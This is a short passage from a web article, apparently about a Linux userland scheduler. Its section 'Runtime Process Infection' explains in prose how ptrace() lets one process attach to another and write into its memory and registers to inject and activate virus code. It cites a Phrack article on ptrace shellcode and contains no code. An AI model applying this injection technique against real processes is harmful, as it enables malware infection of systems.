![]() |
Informative Information for the Uninformed | ![]() |
||||||||||||
![]() |
![]() |
|||||||||||||
![]() ![]() |
![]() |
|
||||||||||||
![]() |
Next: The Algorithm
Up: Linux Improvised Userland Scheduler
Previous: Improvising a Userland Scheduler
Contents
Runtime Process InfectionRuntime infection is done using the notorious ptrace() syscall, which allows a process to attach to another process, assuming of course, that it has root privileges or has a father-child relationship with some exceptions to it. Once the attached process gets into debugging mode, it is possible to modify its registers and write/read from its address space. These are features that are required to slip in the virus code and activate it. For an in-depth review of the ptrace() injection method, refer to the "Building ptrace Injecting Shellcodes" article in Phrack 59[1].
Subsections |